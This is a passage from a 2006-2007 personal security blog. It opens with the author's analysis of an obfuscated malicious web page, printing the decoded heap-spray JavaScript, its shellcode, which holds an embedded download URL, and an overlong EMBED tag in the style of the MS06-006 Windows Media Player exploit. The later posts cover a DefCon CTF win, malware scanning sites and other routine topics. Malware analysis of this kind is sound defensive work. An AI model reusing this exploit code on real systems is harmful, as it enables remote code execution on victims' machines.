e6\xa0\xa5\xa0\xaa\xb6\xe6\xa0\xa6\xa1\xd6\xb6\xe6\xa5\xa5\xa1\xd5\xb6\xe6\xa5\xd0\xa5\xaa\xb6\xe6\xa1\xd6\xa5\xa6\xb6\xe6\xa5\xab\xa4\xa3\xb6\xe6\xa3\xa3\xa4\xa3\xb1\xba\xa8\xaf\xbc\xc0\xd0\xc1\xda\xc3\xc7\xad\xaf\xbc\xdb\xd6\xd2\xd7\xad\xaf\xd1\xdc\xd7\xca\xad\xaf\xd6\xde\xd1\xd6\xd7\xb3\xc0\xc1\xd0\xae\xb1\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xd2\xd2\xd2\xd2\xd1\xd1\xd1\xd1\xd0\xd0\xd0\xd0\xd7\xd7\xd7\xd7\xd6\xd6\xd6\xd6\xd5\xd5\xd5\xd5\xd4\xd4\xd4\xd4\xdb\xdb\xdb\xdb\xda\xda\xda\xda\xd9\xd9\xd9\xd9\xd8\xd8\xd8\xd8\xdf\xdf\xdf\xdf\xd2\xd2\xd2\x96\xdd\xdd\xdd\xdd\xdc\xdc\xdc\xdc\xd2\xd2\xd2\x96\xc2\xc2\xc2\xc2\xc1\xc1\xc1\xc1\xc0\xc0\xc0\xc0\xc7\xc7\xc7\xc7\xc6\xc6\xc6\xc6\xc5\xc5\xc5\xc5\xc4\xc4\xc4\xc4\xcb\xcb\xcb\xcb\xca\xca\xca\xca\xc9\xc9\xc9\xc9\xa3\xa3\xa3\xa3\xa2\xa2\xa2\xa2\xa1\xa1\xa1\xa1\xa0\xa0\xa0\xa0\xa7\xa7\xa7\xa7\xa6\xa6\xa6\xa6\xa5\xa5\xa5\xa5\xa4\xa4\xa4\xa4\xab\xab\xab\xab\xaa\xaa\xaa\xaa\xbd\xe4\xfe\xe5\xb1\xad\xaf\xbc\xd6\xde\xd1\xd6\xd7\xad\xaf\xbc\xd1\xdc\xd7\xca\xad\xaf\xbc\xdb\xc7\xde\xdf\xad\xb3";

var xored_str = xor_str(plain_str, 147);

document.write(xored_str);
</script>

Which gets decoded as:


<SCRIPT>
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do{s+=s;}while(s.length<0x0900000);
s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u382F%u2E39%u3334%u312E%u3639%u352E%u662F%u6C69%u2E65%u6870%u0070");
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv">
</EMBED>

In that last bit, the variable "s" starts with "AAAAAAAA". Then, the do/while loop takes the "s" variable and adds itself to itself 9,437,184 times (0x0900000). After you get 75,497,472 "A"s, it adds shellcode to the end. Redirecting the shellcode to a file and running the file command on it returns "/tmp/js1.sploit: MS-DOS executable (COM)".

The final part of the decoded page might look familiar....if not, check out Windows Media Player Plug-in for Non-Microsoft Browsers Code Execution (MS06-006) - Exploit II.

the H@cker Elite: UF engineers compete in Vegas

2007-08-09T19:56:00.000-04:00

Folks around work get really stoked about our team winning which is cool. It's nice to be in the limelight but I find the need to keep reminding people that it wasn't just psifertex or myself that won CTF. It was a team effort and we couldn't have done it without having the right make up of people, personalities and technical skills.

I think that April Dudash from the Alligator did a wonderful job (article) capturing that sentiment. Thank you, April.

And, thank you, team 1@stplace and @tlas. Every one of you is incredible and I'm thankful to walk amongst you.

1@stplace wins DefCon CTF 2 yrs in a row

2007-08-05T22:46:00.000-04:00

After 24 hrs of competition over 3 days in Vegas, team 1@stplace took first place in the DefCon Capture the Flag contest hosted by Kenshoto. Headed up by team captain @tlas and co-captain Doc Brown (aka drb), we sifted our way through the maze of brilliant confusion weaved together by the Kenshoto guys. They are truly an amazing bunch of dedicated hackers who design the CTF challenges to take their fellow and aspiring hackers to the next level.

I am blessed to have been able to compete again with the talented 1@stplace team composed of @tlas, Doc Brown, fury, jrod, plato, psifertex, shiruken, wrffr and myself (mezzendo). @tlas provided great leadership throughout the time leading up to CTF and during the entire weekend. Teamwork, friendship and communication were key to our win.

Thank you @tlas for believing in me and picking me to be a part of this awesome experience two years in a row.

Evil Bits: Fighting Forensics

2007-07-30T20:07:00.000-04:00

As if freelance writing with things now appearing in both Network Computing and Information Week magazines weren't keeping me busy enough, I'm now a blogger with DarkReading.com. My blog is titled "Evil Bits" and the first post is now available, "Fighting Forensics." It covers some of the current news surrounding antiforensics being released at Black Hat this week, a little history about this area of research and links to previous presentations from Black Hat. Chew up a red pill and take a read...

Microsoft Malware Removal Starter Kit

2007-07-23T12:11:00.000-04:00

I came across this "Microsoft Malware Removal Starter Kit" Friday evening. I don' remember where I saw it, now, but it was released on July 10 and didn't get any recognition in any of the blogs that I frequent.

Basically, they've put together instructions for what I had created while at a previous position here at UF. The HelpDesk for our dept needed a way to do offline scanning and no one was capable of using a Linux Live boot CD to run ClavAV, so I created a disk with BartPE and included several useful tools such as a registry editor and CLI version of McAfee VirusScan.

While BartPE bordered on being a violation of MS' EULA, it never became a target of MS for a takedown. It's interesting that MS has now decided to leverage their WinPE for doing malware removal. Sure, they leave it up to the user to create the disk and add the tools, but they have a brain dead guide on how to do it. Maybe someone at MS said, "Hey, we use this WinPE thingie for creating images for deploying via WDS and installing Windows. I bet we could add more tools and make it even more useful." Well, they probably didn't say that, but I'm glad they didn't say something like, "How can we charge for this!"

Addendum: Online Malware Scanners

2007-07-19T17:00:00.000-04:00

I posted last fall about online scanners that I like to use when doing malware research. Here's a quick addition: "Anubis: Analyzing Unknown Binaries"

Anubis is excellent and much more in-depth than anything else currently available for free.

I'm back...

2007-07-19T16:29:00.000-04:00

After much debate on whether or not to continue blogging, I decided to give it another shot and just not worry so much about the perfection that I typically seek when publishing content. I will try to be more fluid and less focused on making everything I post absolutely perfect which is what causes me to take *so very long* to put up posts and even not post because of the production effort.

So, I'm back...we'll see how it goes.

Off to Interop in Las Vegas!

2007-05-20T00:25:00.000-04:00

I'll be hopping on a plane with Sarah destined to Las Vegas in about 6 hours. CMP is sending me out there as a judge for the Best of Interop security category. It should be a fun and exciting experience to finally meet face-to-face with many of the vendors I've only spoken with via e-mail or on the phone. Also, Sarah and I will get to take in the many sights of Vegas and see at least one show while we are there. Of course, I do have to thank Jordan for having a baby so I could take is place on the trip!

During the day and most of the evenings, my schedule is fully booked between judges meetings, a VIP reception and wine tasting, vendor meetings, walking the expo floor, checking out the Interop labs and a poker tournament. One of the highlights is getting to meet with Kevin Mandia from Mandiant. He co-authored the first book I ever read on incident response and has assembled an excellent team at Mandiant that includes Jamie Butler and Kris Kendall. It should be interesting. I plan on getting more info on their upcoming tool called Caprica Six (any BSG fans reading this? ;-).

Mac OS X 10.4.9 fixes Cisco VPN client and ipfw

2007-03-14T13:06:00.000-04:00

But, they don't mention it in their "About the Mac OS X 10.4.9 Update (delta)" page. I bring it up because this is an issue that I've been dealing with for the year and a half that I've had my 12" PowerBook G4. Everytime I connected to the VPN at work using the Cisco VPN client, I suddenly couldn't browse the web, check e-mail, etc. After digging around some logs, I found that TCP fragments were being blocked by the Mac OS X firewall (ipfw) according to /var/log/ipfw.log. The following command fix things.

sudo ipfw add 05000 allow tcp from any to any frag

So, a week ago, one of our network engineers came to Jordan who sent him on to me about a problem a big Apple user on campus was having with the VPN. I was inserted into the conversation and told them about my "fix" for the problem. At some point in the thread after discussing how normal end users could never do this, an Apple e-mail address was CC'ed.

A week later, 10.4.9 is released. I reboot this morning after the update and connected to the VPN about 15 mins ago. As I was typing the the "fix," Mac Mail alerts me that I have new mail. Huh? How did it work? I didn't put the "fix" in as a permanent rule. Let's check the ipfw rules...

02065 allow tcp from any to any frag

How nice of them to fix the problem. I checked Apple's support site to see if it was mentioned in the update...of course not! Just another silent fix from Apple. Thanks fellas!

VMware: Record and Replay

2007-03-01T21:22:00.000-05:00

About 3 hours before the event, I heard that VMware was going to be on-campus to recruit students. Big deal. IBM's ISS stopped by at our SIT meeting last week. Well, actually it was a big deal...and no, not because of the free pizza and soda, although I'm sure that's the only reason a fourth of the students were there. No, I was there because they were giving away free VMware Workstation licenses. You might say that VMware Server and Player are free, but they are missing some of the seriously bad@ss functionality that Workstation possesses.

For example, multiple snapshots. I REALLY wish the free server version supported this feature. I use VMware server a lot both for UF and freelance work. My Stack-o-Hack currently has four machines with Ubuntu 6.10 Server and VMware Server...but I digress.

So, at the meeting, the guy presenting talked about a new feature being released in VMware Workstation 6. It is called Record and Replay. What does it do? You hit the RECORD button and it records EVERYTHING about your virtual machine until you stop it. Of course, it takes up lots of space but it record CPU registers, memory and freaking network traffic! How wicked is that? Vulnerability researchers and exploit writers rejoice!

Take a look at the blog entry from VMware.

And, for you Intel Mac users that are testing VMware Fusion and are annoyed that snapshots are not officially supported, don't worry. Beta 2 next week will have it supported with pretty little "Take Snapshot" and "Revert to Snapshot" buttons. I saw it on a 17" Mac Book Pro that one of VMware employees had. I knew Jordan would be so excited about it, I took a picture with my phone and sent it to him!

Time to slurp...er, uhm, catch up!

2007-02-27T21:36:00.000-05:00

I'll be catching up soon. Things have been busy with my family UF, NWC and DRSI. I've got several interesting entries lined up related to work, freelancing and things I've been doing with the SIT.

For now, check out this "bleeding threat" article...."Pod Slurping: The latest data threat."

When you're done reading it, take a look at the following to pages and tell me how pod slurping is the "the latest data threat." Oh wait, if you tacked on "...from 2005," then it might make better sense. Note that slurp.exe was created in June 2005.

Sep 5, 2005 - Podslurping and Bluesnarfing - The latest IT threats

Feb 20, 2006 - iPods Slurp Secrets

Online Malware Scanners and Sandboxes

2006-10-20T10:07:00.001-04:00

I spend some time everyday looking at botnet traffic, collecting binaries and either analyzing the binaries myself or submitting them to an online scanner/sandbox. It surprises me how many people I talk to that don't realize these resources are freely available out there.

Why are they free? Ever heard of Nepenthes? It is sweet malware collection tool that emulates vulnerable services, lets attackers/bots/worms/etc attack it and push its payload onto it. So, what's my point besides asking too many questions in one post? These sites use people like me like a distributed Nepenthes. Make sense? Good!

On to the good stuff...

VirusTotal is the most comprehensive scanning site I've seen. It uses around 25 different virus/malware scanners to scan submitted files. The downside is that the site has become quite popular and it sometimes takes 5-20 minutes to get a file scanned. One highlight of using this site is that submitted files are passed along to AV companies so signatures are produced quicker (hopefully!).

Jotti's Virus Scan site doesn't use nearly as many scanners as VirusTotal but you can usually don't have to wait as long to get a file scanned.

Kaspersky is, in my opinion, the best virus scanning engine out. When you look at the stats for VirusTotal, they consistently identify more malware than any other tool. We've seen this based on internal testing, also. I've mostly left this link up here as a reminder that Kaspersky used to show what file packers were used. This was an awesome feature of their web scanner but it no longer shows this information. :-(

Online sandbox tools are HOT! The two I use are Norman's Sandbox and the recently released CWSandbox. I recommend you test out both tools to see how they compare. Norman gives a more "user-friendly" output while CWSandbox e-mails an XML results file. Additionally, Norman is based on a commercial product and CWSandbox is the result of a graduate student's research.

That's it for today. If you know of any other sites that provide similarly functionality such VirusTotal or the sandboxes, let me know.

Server Move!

2006-10-17T23:31:00.000-04:00

I just changed servers and am waiting for DNS to propagate. For the last couple of years, I have been hosting our sites from a Cox Cable business acccount. Thanks to the 9 year anniversary at Dreamhost, I have switched and will be dumping my Business account soon. They were offering a full year of hosting with a discount of $99.99. Impossible to pass up with the ridiculous amounts of storage, bandwidth and features. Now, I need to take advantage of all the cool stuff. See you soon.

UPDATE: I am back up and running. Dreamhost rocks!

Ethical Hacker Skillz Challenge - My Answer

2006-08-21T09:12:00.000-04:00

